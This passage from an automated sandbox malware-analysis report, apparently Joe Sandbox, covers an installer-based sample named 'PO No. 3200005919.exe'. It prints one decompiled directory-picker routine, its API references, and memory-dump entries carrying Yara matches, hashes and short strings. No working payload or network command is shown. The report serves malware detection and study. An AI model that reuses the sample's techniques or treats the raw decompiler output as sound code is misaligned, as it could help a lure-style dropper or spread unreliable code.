                                                                      • Instruction Fuzzy Hash: AFB15870900608FFDB11AFA0DD85AAE7B79FB44354F00847AFA45B61A0CB754E51DF68
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 78%
                                                                      			E00404814(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				long _v16;
                                                                      				long _v20;
                                                                      				long _v24;
                                                                      				char _v28;
                                                                      				intOrPtr _v32;
                                                                      				long _v36;
                                                                      				char _v40;
                                                                      				unsigned int _v44;
                                                                      				signed int _v48;
                                                                      				WCHAR* _v56;
                                                                      				intOrPtr _v60;
                                                                      				intOrPtr _v64;
                                                                      				intOrPtr _v68;
                                                                      				WCHAR* _v72;
                                                                      				void _v76;
                                                                      				struct HWND__* _v80;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				intOrPtr _t82;
                                                                      				long _t87;
                                                                      				short* _t89;
                                                                      				void* _t95;
                                                                      				signed int _t96;
                                                                      				int _t109;
                                                                      				signed short _t114;
                                                                      				signed int _t118;
                                                                      				struct HWND__** _t122;
                                                                      				intOrPtr* _t138;
                                                                      				WCHAR* _t146;
                                                                      				unsigned int _t150;
                                                                      				signed int _t152;
                                                                      				unsigned int _t156;
                                                                      				signed int _t158;
                                                                      				signed int* _t159;
                                                                      				signed int* _t160;
                                                                      				struct HWND__* _t166;
                                                                      				struct HWND__* _t167;
                                                                      				int _t169;
                                                                      				unsigned int _t197;
                                                                      
                                                                      				_t156 = __edx;
                                                                      				_t82 =  *0x422700;
                                                                      				_v32 = _t82;
                                                                      				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                                                                      				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                      				if(_a8 == 0x40b) {
                                                                      					E004059F6(0x3fb, _t146);
                                                                      					E00406644(_t146);
                                                                      				}
                                                                      				_t167 = _a4;
                                                                      				if(_a8 != 0x110) {
                                                                      					L8:
                                                                      					if(_a8 != 0x111) {
                                                                      						L20:
                                                                      						if(_a8 == 0x40f) {
                                                                      							L22:
                                                                      							_v8 = _v8 & 0x00000000;
                                                                      							_v12 = _v12 & 0x00000000;
                                                                      							E004059F6(0x3fb, _t146);
                                                                      							if(E00405D89(_t186, _t146) == 0) {
                                                                      								_v8 = 1;
                                                                      							}
                                                                      							E004063B0(0x4216f8, _t146);
                                                                      							_t87 = E0040678A(1);
                                                                      							_v16 = _t87;
                                                                      							if(_t87 == 0) {
                                                                      								L30:
                                                                      								E004063B0(0x4216f8, _t146);
                                                                      								_t89 = E00405D2C(0x4216f8);
                                                                      								_t158 = 0;
                                                                      								if(_t89 != 0) {
                                                                      									 *_t89 = 0;
                                                                      								}
                                                                      								if(GetDiskFreeSpaceW(0x4216f8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                      									goto L35;
                                                                      								} else {
                                                                      									_t169 = 0x400;
                                                                      									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                      									asm("cdq");
                                                                      									_v48 = _t109;
                                                                      									_v44 = _t156;
                                                                      									_v12 = 1;
                                                                      									goto L36;
                                                                      								}
                                                                      							} else {
                                                                      								_t159 = 0;
                                                                      								if(0 == 0x4216f8) {
                                                                      									goto L30;
                                                                      								} else {
                                                                      									goto L26;
                                                                      								}
                                                                      								while(1) {
                                                                      									L26:
                                                                      									_t114 = _v16(0x4216f8,  &_v48,  &_v28,  &_v40);
                                                                      									if(_t114 != 0) {
                                                                      										break;
                                                                      									}
                                                                      									if(_t159 != 0) {
                                                                      										 *_t159 =  *_t159 & _t114;
                                                                      									}
                                                                      									_t160 = E00405CCD(0x4216f8);
                                                                      									 *_t160 =  *_t160 & 0x00000000;
                                                                      									_t159 = _t160;
                                                                      									 *_t159 = 0x5c;
                                                                      									if(_t159 != 0x4216f8) {
                                                                      										continue;
                                                                      									} else {
                                                                      										goto L30;
                                                                      									}
                                                                      								}
                                                                      								_t150 = _v44;
                                                                      								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                      								_v44 = _t150 >> 0xa;
                                                                      								_v12 = 1;
                                                                      								_t158 = 0;
                                                                      								__eflags = 0;
                                                                      								L35:
                                                                      								_t169 = 0x400;
                                                                      								L36:
                                                                      								_t95 = E00404CB1(5);
                                                                      								if(_v12 != _t158) {
                                                                      									_t197 = _v44;
                                                                      									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                      										_v8 = 2;
                                                                      									}
                                                                      								}
                                                                      								if( *((intOrPtr*)( *0x42921c + 0x10)) != _t158) {
                                                                      									E00404C99(0x3ff, 0xfffffffb, _t95);
                                                                      									if(_v12 == _t158) {
                                                                      										SetDlgItemTextW(_a4, _t169, 0x4216e8);
                                                                      									} else {
                                                                      										E00404BD0(_t169, 0xfffffffc, _v48, _v44);
                                                                      									}
                                                                      								}
                                                                      								_t96 = _v8;
                                                                      								 *0x42a304 = _t96;
                                                                      								if(_t96 == _t158) {
                                                                      									_v8 = E0040140B(7);
                                                                      								}
                                                                      								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                      									_v8 = _t158;
                                                                      								}
                                                                      								E00404367(0 | _v8 == _t158);
                                                                      								if(_v8 == _t158 &&  *0x423718 == _t158) {
                                                                      									E0040476D();
                                                                      								}
                                                                      								 *0x423718 = _t158;
                                                                      								goto L53;
                                                                      							}
                                                                      						}
                                                                      						_t186 = _a8 - 0x405;
                                                                      						if(_a8 != 0x405) {
                                                                      							goto L53;
                                                                      						}
                                                                      						goto L22;
                                                                      					}
                                                                      					_t118 = _a12 & 0x0000ffff;
                                                                      					if(_t118 != 0x3fb) {
                                                                      						L12:
                                                                      						if(_t118 == 0x3e9) {
                                                                      							_t152 = 7;
                                                                      							memset( &_v76, 0, _t152 << 2);
                                                                      							_v80 = _t167;
                                                                      							_v72 = 0x423728;
                                                                      							_v60 = E00404B6A;
                                                                      							_v56 = _t146;
                                                                      							_v68 = E004063D2(_t146, 0x423728, _t167, 0x421f00, _v12);
                                                                      							_t122 =  &_v80;
                                                                      							_v64 = 0x41;
                                                                      							__imp__SHBrowseForFolderW(_t122);
                                                                      							if(_t122 == 0) {
                                                                      								_a8 = 0x40f;
                                                                      							} else {
                                                                      								__imp__CoTaskMemFree(_t122);
                                                                      								E00405C81(_t146);
                                                                      								_t125 =  *((intOrPtr*)( *0x42a254 + 0x11c));
                                                                      								if( *((intOrPtr*)( *0x42a254 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\Overfurnished\\Tuberculisation\\Woodwose") {
                                                                      									E004063D2(_t146, 0x423728, _t167, 0, _t125);
                                                                      									if(lstrcmpiW(0x4281e0, 0x423728) != 0) {
                                                                      										lstrcatW(_t146, 0x4281e0);
                                                                      									}
                                                                      								}
                                                                      								 *0x423718 =  *0x423718 + 1;
                                                                      								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                      							}
                                                                      						}
                                                                      						goto L20;
                                                                      					}
                                                                      					if(_a12 >> 0x10 != 0x300) {
                                                                      						goto L53;
                                                                      					}
                                                                      					_a8 = 0x40f;
                                                                      					goto L12;
                                                                      				} else {
                                                                      					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                      					if(E00405CF8(_t146) != 0 && E00405D2C(_t146) == 0) {
                                                                      						E00405C81(_t146);
                                                                      					}
                                                                      					 *0x429218 = _t167;
                                                                      					SetWindowTextW(_t166, _t146);
                                                                      					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                      					_push(1);
                                                                      					E00404345(_t167);
                                                                      					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                      					_push(0x14);
                                                                      					E00404345(_t167);
                                                                      					E0040437A(_t166);
                                                                      					_t138 = E0040678A(7);
                                                                      					if(_t138 == 0) {
                                                                      						L53:
                                                                      						return E004043AC(_a8, _a12, _a16);
                                                                      					} else {
                                                                      						 *_t138(_t166, 1);
                                                                      						goto L8;
                                                                      					}
                                                                      				}
                                                                      			}













































                                                                      0x00404814
                                                                      0x0040481a
                                                                      0x00404820
                                                                      0x0040482d
                                                                      0x0040483b
                                                                      0x0040483e
                                                                      0x00404846
                                                                      0x0040484c
                                                                      0x0040484c
                                                                      0x00404858
                                                                      0x0040485b
                                                                      0x004048c9
                                                                      0x004048d0
                                                                      0x004049a7
                                                                      0x004049ae
                                                                      0x004049bd
                                                                      0x004049bd
                                                                      0x004049c1
                                                                      0x004049cb
                                                                      0x004049d8
                                                                      0x004049da
                                                                      0x004049da
                                                                      0x004049e8
                                                                      0x004049ef
                                                                      0x004049f6
                                                                      0x004049f9
                                                                      0x00404a35
                                                                      0x00404a37
                                                                      0x00404a3d
                                                                      0x00404a42
                                                                      0x00404a46
                                                                      0x00404a48
                                                                      0x00404a48
                                                                      0x00404a64
                                                                      0x00000000
                                                                      0x00404a66
                                                                      0x00404a69
                                                                      0x00404a77
                                                                      0x00404a7d
                                                                      0x00404a7e
                                                                      0x00404a81
                                                                      0x00404a84
                                                                      0x00000000
                                                                      0x00404a84
                                                                      0x004049fb
                                                                      0x004049fd
                                                                      0x00404a01
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404a03
                                                                      0x00404a03
                                                                      0x00404a10
                                                                      0x00404a15
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404a19
                                                                      0x00404a1b
                                                                      0x00404a1b
                                                                      0x00404a24
                                                                      0x00404a26
                                                                      0x00404a2b
                                                                      0x00404a2e
                                                                      0x00404a33
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404a33
                                                                      0x00404a90
                                                                      0x00404a9a
                                                                      0x00404a9d
                                                                      0x00404aa0
                                                                      0x00404aa7
                                                                      0x00404aa7
                                                                      0x00404aa9
                                                                      0x00404aa9
                                                                      0x00404aae
                                                                      0x00404ab0
                                                                      0x00404ab8
                                                                      0x00404abf
                                                                      0x00404ac1
                                                                      0x00404acc
                                                                      0x00404acc
                                                                      0x00404ac1
                                                                      0x00404adc
                                                                      0x00404ae6
                                                                      0x00404aee
                                                                      0x00404b09
                                                                      0x00404af0
                                                                      0x00404af9
                                                                      0x00404af9
                                                                      0x00404aee
                                                                      0x00404b0e
                                                                      0x00404b13
                                                                      0x00404b18
                                                                      0x00404b21
                                                                      0x00404b21
                                                                      0x00404b2a
                                                                      0x00404b2c
                                                                      0x00404b2c
                                                                      0x00404b38
                                                                      0x00404b40
                                                                      0x00404b4a
                                                                      0x00404b4a
                                                                      0x00404b4f
                                                                      0x00000000
                                                                      0x00404b4f
                                                                      0x004049f9
                                                                      0x004049b0
                                                                      0x004049b7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004049b7
                                                                      0x004048d6
                                                                      0x004048df
                                                                      0x004048f9
                                                                      0x004048fe
                                                                      0x00404908
                                                                      0x0040490f
                                                                      0x0040491b
                                                                      0x0040491e
                                                                      0x00404921
                                                                      0x00404928
                                                                      0x00404930
                                                                      0x00404933
                                                                      0x00404937
                                                                      0x0040493e
                                                                      0x00404946
                                                                      0x004049a0
                                                                      0x00404948
                                                                      0x00404949
                                                                      0x00404950
                                                                      0x0040495a
                                                                      0x00404962
                                                                      0x0040496f
                                                                      0x00404983
                                                                      0x00404987
                                                                      0x00404987
                                                                      0x00404983
                                                                      0x0040498c
                                                                      0x00404999
                                                                      0x00404999
                                                                      0x00404946
                                                                      0x00000000
                                                                      0x004048fe
                                                                      0x004048ec
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004048f2
                                                                      0x00000000
                                                                      0x0040485d
                                                                      0x0040486a
                                                                      0x00404873
                                                                      0x00404880
                                                                      0x00404880
                                                                      0x00404887
                                                                      0x0040488d
                                                                      0x00404896
                                                                      0x00404899
                                                                      0x0040489c
                                                                      0x004048a4
                                                                      0x004048a7
                                                                      0x004048aa
                                                                      0x004048b0
                                                                      0x004048b7
                                                                      0x004048be
                                                                      0x00404b55
                                                                      0x00404b67
                                                                      0x004048c4
                                                                      0x004048c7
                                                                      0x00000000
                                                                      0x004048c7
                                                                      0x004048be

                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404863
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 0040488D
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040493E
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404949
                                                                      • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 0040497B
                                                                      • lstrcatW.KERNEL32(?,Call), ref: 00404987
                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404999
                                                                        • Part of subcall function 004059F6: GetDlgItemTextW.USER32(?,?,00000400,004049D0), ref: 00405A09
                                                                        • Part of subcall function 00406644: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO No. 3200005919.exe",00403464,C:\Users\user\AppData\Local\Temp\,75703420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
                                                                        • Part of subcall function 00406644: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
                                                                        • Part of subcall function 00406644: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO No. 3200005919.exe",00403464,C:\Users\user\AppData\Local\Temp\,75703420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
                                                                        • Part of subcall function 00406644: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO No. 3200005919.exe",00403464,C:\Users\user\AppData\Local\Temp\,75703420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE
                                                                      • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A5C
                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A77
                                                                        • Part of subcall function 00404BD0: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
                                                                        • Part of subcall function 00404BD0: wsprintfW.USER32 ref: 00404C7A
                                                                        • Part of subcall function 00404BD0: SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: (7B$A$C:\Users\user\Overfurnished\Tuberculisation\Woodwose$Call
                                                                      • API String ID: 2624150263-2786275623
                                                                      • Opcode ID: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
                                                                      • Instruction ID: 8d8d1438250e4d518a9e2371570913b63a9457987511b3c3302aefac7d34506d
                                                                      • Opcode Fuzzy Hash: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
                                                                      • Instruction Fuzzy Hash: B3A184F1A00209ABDB119FA5CD45AAF77B8EF84314F14843BFA01B62D1D77C99418B6D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MemoryProtectVirtual
                                                                      • String ID: rO4D$Tr
                                                                      • API String ID: 2706961497-797051081
                                                                      • Opcode ID: e8ffee1c56be9550a6cd40779fe8da21366d44b408b6226adc23f5e7b9a3eefe
                                                                      • Instruction ID: 5ae9e3742ef2e1e6c832b8d57e469edc62c9ffc9238cb15fb1946918de3362ee
                                                                      • Opcode Fuzzy Hash: e8ffee1c56be9550a6cd40779fe8da21366d44b408b6226adc23f5e7b9a3eefe
                                                                      • Instruction Fuzzy Hash: 0F625A21A083858FDB318E38C9D93DA7BA25F533A0F5982AECCD98F1D6D3359545C712
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5*$6UA
                                                                      • API String ID: 0-1027521020
                                                                      • Opcode ID: 5a3634927aa14c9fc5db836d291e657a1c4bc21d728fccf96a35ba441a66dc95
                                                                      • Instruction ID: b8b9f161b7b35d2a3caec8c7f15128f350b54e12b1387cfccf2a59aa34bb2f88
                                                                      • Opcode Fuzzy Hash: 5a3634927aa14c9fc5db836d291e657a1c4bc21d728fccf96a35ba441a66dc95
                                                                      • Instruction Fuzzy Hash: D4C14B6327CE686EF10CEA38ACDE9BB139EF6D6126371D52FE087C315AF46568470160
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ]u>$iz~
                                                                      • API String ID: 0-3482841198
                                                                      • Opcode ID: 19dafc697004287605672e35e27f9cf0c6781e1435bb3e9932f8524ff230ec46
                                                                      • Instruction ID: 2a4dbaaadadb6cd62f7992743022025c011f1c8608c2104f10542b4504fd1208
                                                                      • Opcode Fuzzy Hash: 19dafc697004287605672e35e27f9cf0c6781e1435bb3e9932f8524ff230ec46
                                                                      • Instruction Fuzzy Hash: 7AB199756047169FDB309E38CAE43DA77E2AF853D0F5A816ADC89D7244E334A9C2C742
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #$$
                                                                      • API String ID: 0-144778460
                                                                      • Opcode ID: 3f999621c44ddba246bc41c4d9054142fbfa85b44815d5553fba1e82fb02cd1b
                                                                      • Instruction ID: 1ab01cc9e98b5b954d94bad0f6daa03b46ed7334500312004fac83a65affcc59
                                                                      • Opcode Fuzzy Hash: 3f999621c44ddba246bc41c4d9054142fbfa85b44815d5553fba1e82fb02cd1b
                                                                      • Instruction Fuzzy Hash: 9A816435A4039A9FDF306F348AA83DA3BE2EF56790F964519CCC89B101D73589CACB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: d7402fa6e7dc308eae97e063b225dd27d6b7f5e598051a642e1b5b80260035c5
                                                                      • Instruction ID: 44f65ecf2bafd5a8d16f1d8f673b909344bfa04ea7347da3491a776f01e2bb2f
                                                                      • Opcode Fuzzy Hash: d7402fa6e7dc308eae97e063b225dd27d6b7f5e598051a642e1b5b80260035c5
                                                                      • Instruction Fuzzy Hash: 03510E46F2E335D9E7AAA07483E03F64D52CF1E181D5387264E27F2551732E3A7A3084
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: vM
                                                                      • API String ID: 0-417044066
                                                                      • Opcode ID: ecd111b0d11d560148f65673c2054bf21b224083a9ae554c6b29a6bf0741f257
                                                                      • Instruction ID: e841042fd919c9e994e239fa4c6308315e43083373d75b51dfab4396684bf4f2
                                                                      • Opcode Fuzzy Hash: ecd111b0d11d560148f65673c2054bf21b224083a9ae554c6b29a6bf0741f257
                                                                      • Instruction Fuzzy Hash: F7A1687170435A9FDB749E78C9A47DE37E6AF96340F82422EDC8AC7244E7308A86C701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: u3XW
                                                                      • API String ID: 0-3706046320
                                                                      • Opcode ID: d3eabcfb77adae35e73042addce0c642a6d791982c85d04757b749af6959d494
                                                                      • Instruction ID: 738936c75cd80b23ad133c347db7f76d1f0d428a17e15857cfbd7132088fd281
                                                                      • Opcode Fuzzy Hash: d3eabcfb77adae35e73042addce0c642a6d791982c85d04757b749af6959d494
                                                                      • Instruction Fuzzy Hash: 0CA1497070475A8FEF358D398DE47DE37A2EF99350F948239CD99DB289D33085868A01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: u3XW
                                                                      • API String ID: 0-3706046320
                                                                      • Opcode ID: e8ae836048e7fba5caacc06dfc5b5bd2a0a79d48bb8505415836ebe4489fe5a0
                                                                      • Instruction ID: eed97481df3901576178de5beaf393bb8820ec6e9c606f12da8c33cf483ba9f6
                                                                      • Opcode Fuzzy Hash: e8ae836048e7fba5caacc06dfc5b5bd2a0a79d48bb8505415836ebe4489fe5a0
                                                                      • Instruction Fuzzy Hash: 4091357070475A8FEF348E798DE47DE37A2EF99350F94813ACC999B249D33095868A01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: u3XW
                                                                      • API String ID: 0-3706046320
                                                                      • Opcode ID: 778a225e23d883ba43d831126664efdf6bf1d1f3fb90ff3d948eea999e3abfba
                                                                      • Instruction ID: 47b02eb6ae22e4f04e61a6612d3a716bea0cf0fb42365f7bcbfbcf3583307c52
                                                                      • Opcode Fuzzy Hash: 778a225e23d883ba43d831126664efdf6bf1d1f3fb90ff3d948eea999e3abfba
                                                                      • Instruction Fuzzy Hash: 3A91057070475A8FEF348E39CDE57DE37A2EF99350F94813ACD999B289D33095868A01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: u3XW
                                                                      • API String ID: 0-3706046320
                                                                      • Opcode ID: c8cc071f4d7ab91649604cbaacc0dbfe8087f1f17cfd63f74d21fbf0d0c83293
                                                                      • Instruction ID: 636170e244ded7e7350d3174ef52ff0ed93906f73157414a77c4a55b9a8a0dc5
                                                                      • Opcode Fuzzy Hash: c8cc071f4d7ab91649604cbaacc0dbfe8087f1f17cfd63f74d21fbf0d0c83293
                                                                      • Instruction Fuzzy Hash: 3491067070475A8FEF349D398DE47DE37A2EF99350F948239CD99DB249D33095868A01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: u3XW
                                                                      • API String ID: 0-3706046320
                                                                      • Opcode ID: 7ae4fa0d98b65f807591966bbf4c474e323451aeb00da97e6b093dcbe63b4331
                                                                      • Instruction ID: bfc33112a2993837d62d5dfbf01ee280e9ea34fbdf28b92795044f0b01ae621c
                                                                      • Opcode Fuzzy Hash: 7ae4fa0d98b65f807591966bbf4c474e323451aeb00da97e6b093dcbe63b4331
                                                                      • Instruction Fuzzy Hash: 0691057070475A8FEF349E398DE47DE37A2EF99350F948139CD99DB289D33095868A01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: vM
                                                                      • API String ID: 0-417044066
                                                                      • Opcode ID: 16d5542da816db671498bc18cf00ac82a0d03200cb30c5be5124b3787d75b162
                                                                      • Instruction ID: 4e712a5a0415f9aeac63b021eb43d08dc4d7cfb96978660c8dbe2f2710b8561d
                                                                      • Opcode Fuzzy Hash: 16d5542da816db671498bc18cf00ac82a0d03200cb30c5be5124b3787d75b162
                                                                      • Instruction Fuzzy Hash: 1C81457570435A9FDB349E78C9A47EE37A2AF9A340F81822EDC8DCB244D7305A85C701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: vM
                                                                      • API String ID: 0-417044066
                                                                      • Opcode ID: c8d2b52f55081f4bf14f990c63a0b4ca4852c9d44a2be988c0ff53abf2342c31
                                                                      • Instruction ID: 387bea795a89e1532e8436d9a2cf78c2773836f086dea83312487065d0c78c7b
                                                                      • Opcode Fuzzy Hash: c8d2b52f55081f4bf14f990c63a0b4ca4852c9d44a2be988c0ff53abf2342c31
                                                                      • Instruction Fuzzy Hash: F571357570434A9FDB349E28C9A47EE37A2AF9A380F81822EDC89CB244D7315A85C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `
                                                                      • API String ID: 0-1850852036
                                                                      • Opcode ID: d93ac7f41291b83790b3e847ecfa4f4977ff0bd2fb092cd5d03dd87940ecff42
